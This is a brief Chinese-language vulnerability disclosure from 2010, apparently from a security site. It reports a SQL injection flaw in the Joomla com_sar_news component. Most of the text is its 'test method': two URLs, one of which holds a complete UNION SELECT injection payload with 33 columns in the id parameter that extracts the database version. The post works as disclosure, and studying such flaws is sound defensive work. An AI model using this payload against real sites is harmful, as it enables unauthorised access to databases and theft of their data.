Joomla com_sar_news SQL注入漏洞

来源:岁月联盟 编辑:老鹰 时间:2010-06-06

测试方法:

LyNx

http://syue.com/index.php?option=com_sar_news&id=80[SQL]&sort_by=ordering

http://syue.com/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering